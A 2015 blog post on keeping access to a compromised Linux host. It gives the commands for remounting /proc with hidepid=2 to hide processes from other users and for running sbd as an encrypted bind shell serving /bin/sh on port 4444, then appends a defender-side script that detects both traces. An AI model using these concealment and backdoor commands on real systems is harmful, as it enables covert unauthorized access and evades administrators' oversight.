Saturday, July 11, 2015

Maintaining Access With sbd

sbd is a program similar to netcat that allows one to read and write to TCP sockets, with optional AES-CBC-128 encryption and a shared secret. sbd is fully portable and is available for Windows and Unix/Linux operating systems.

In this post I will show how, after gaining privileged access to a system, one can maintain access using sbd. I will also illustrate some of the pitfalls of using tools like sbd.

After compromising an account that has sudo rights, remount the proc file system as follows:

sudo mount -o remount,rw,hidepid=2 /proc
 
This command remounts the proc file system with hidepid=2, which makes the /proc/PID directories of other users' processes invisible to unprivileged users (they are not even listed in /proc). Tools such as ps and top, which read /proc, will then show each user only the processes they own. An unobservant administrator may not notice this at first when logging in under their own account.

Note that the hidepid mount option requires Linux kernel 3.3 or later. Also, root will still be able to see all processes, and the option itself is visible to anyone who reads /proc/mounts or runs mount.

Next run sbd as a listener. An example of possible options is:

sbd -l -c on -k password -vv -n -e /bin/sh -p 4444

-l : listen for connections
-c on : encryption on
-k password : shared secret from which the session key is derived; a client that connects with a different secret cannot exchange usable traffic
-vv : verbose
-n : disable name resolution
-e /bin/sh : execute this program on connection (a bind shell)
-p 4444 : listen on port 4444

With hidepid=2 in place, the sbd process is hidden from the non-privileged user (ps shows only that user's own processes), but the ss command still shows the host listening on port 4444. This is because ss reads the socket table from /proc/net, which hidepid does not restrict; only the mapping from socket to owning process (ss -p) is lost.

[Screenshots: ps run as a non-privileged user does not list the sbd process; ss still shows a listener on port 4444.]
From the other host you can initiate the connection as follows (the encryption and shared-secret options must match the listener's):

sbd -c on -k password -vv -n <listener-ip> 4444

[Screenshot: the client connects and receives a shell.]
This method of maintaining access is simple but not very robust: sbd can still be discovered via the netstat and ss commands, and the hidepid option itself stands out in /proc/mounts on a host where it is not normally set. Also, note that a bind shell was used in this example, so the port used must be opened on any firewalls between the attacker and the host. A reverse shell, where the compromised host connects out to the attacker, would be better suited for this case.
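The following script is an added example and is not from the original post or from sbd. It shows the defender's side of the two points made above: the hidepid option is readable from /proc/mounts, and every TCP listener is still published in /proc/net/tcp (the same table ss and netstat read) even though the owning PID cannot be resolved by a non-root user once hidepid=2 is in effect. The /proc/mounts and /proc/net/tcp excerpts embedded in it are constructed, not captured from a real host; the port 4444 listener and inode numbers are made up to match the post's example.

```shell
#!/bin/sh
# Added example, not from the original post: a defender-side check for the
# observables discussed above. hidepid hides other users' /proc/PID entries,
# but the kernel still publishes every TCP socket in /proc/net/tcp, and the
# hidepid option itself appears in /proc/mounts.
# The sample inputs below are constructed, not captured from a host.

# Constructed /proc/mounts excerpt with hidepid=2 applied to /proc.
SAMPLE_MOUNTS='sysfs /sys sysfs rw,nosuid,nodev,noexec,relatime 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime,hidepid=2 0 0'

# Constructed /proc/net/tcp excerpt: sshd on 22 (0x0016), the sbd listener on
# 4444 (0x115C), and one established connection (st 01) that must be ignored.
SAMPLE_TCP='  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 9999 1 0000000000000000 100 0 0 10 0
   1: 00000000:115C 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   2: 0100007F:0016 0100007F:C7A4 01 00000000:00000000 00:00000000 00000000     0        0 12400 1 0000000000000000 20 4 31 10 -1'

# Read /proc/mounts-format text on stdin; print the hidepid value set on the
# /proc mount, or nothing if the option is absent.
proc_hidepid() {
    while read -r _dev mnt fstype opts _rest; do
        [ "$mnt" = "/proc" ] && [ "$fstype" = "proc" ] || continue
        case ",$opts," in
            *,hidepid=*) v=${opts#*hidepid=}; printf '%s\n' "${v%%,*}" ;;
        esac
    done
}

# Read /proc/net/tcp-format text on stdin; print "port inode" for every socket
# in LISTEN state (st == 0A). The port is the hex part of local_address after
# the colon; the header line is skipped because its 4th field is "st".
tcp_listeners() {
    while read -r _sl laddr _raddr st _queues _timers _retr _uid _timeout inode _rest; do
        [ "$st" = "0A" ] || continue
        printf '%d %s\n' "$((0x${laddr##*:}))" "$inode"
    done
}

# Map a socket inode to the PID holding it by walking /proc/PID/fd, as ss -p
# and lsof do. This is exactly the step hidepid=2 breaks for a non-root user:
# the listener is visible in /proc/net/tcp, but its owner's /proc/PID is not.
socket_owner_pid() {
    for d in /proc/[0-9]*; do
        [ -d "$d/fd" ] || continue
        for fd in "$d"/fd/*; do
            [ "$(readlink "$fd" 2>/dev/null)" = "socket:[$1]" ] && { printf '%s\n' "${d#/proc/}"; return 0; }
        done
    done
    return 1
}

# Without arguments, run against the constructed samples; with --live, read
# the real /proc of the host the script runs on.
if [ "${1:-}" = "--live" ]; then
    printf 'hidepid=%s\n' "$(proc_hidepid </proc/mounts)"
    tcp_listeners </proc/net/tcp | while read -r port inode; do
        pid=$(socket_owner_pid "$inode") || pid='hidden or gone'
        printf 'LISTEN port %s inode %s pid %s\n' "$port" "$inode" "$pid"
    done
else
    printf 'hidepid=%s\n' "$(printf '%s\n' "$SAMPLE_MOUNTS" | proc_hidepid)"
    printf '%s\n' "$SAMPLE_TCP" | tcp_listeners
fi
```

Run with --live as an unprivileged user on a host where hidepid=2 has been applied and every listener owned by another user comes back as "hidden or gone" while still being listed; run it as root and the PIDs resolve. IPv6 listeners live in /proc/net/tcp6, which uses the same columns with 32-hex-digit addresses, so the same tcp_listeners function applies to it unchanged.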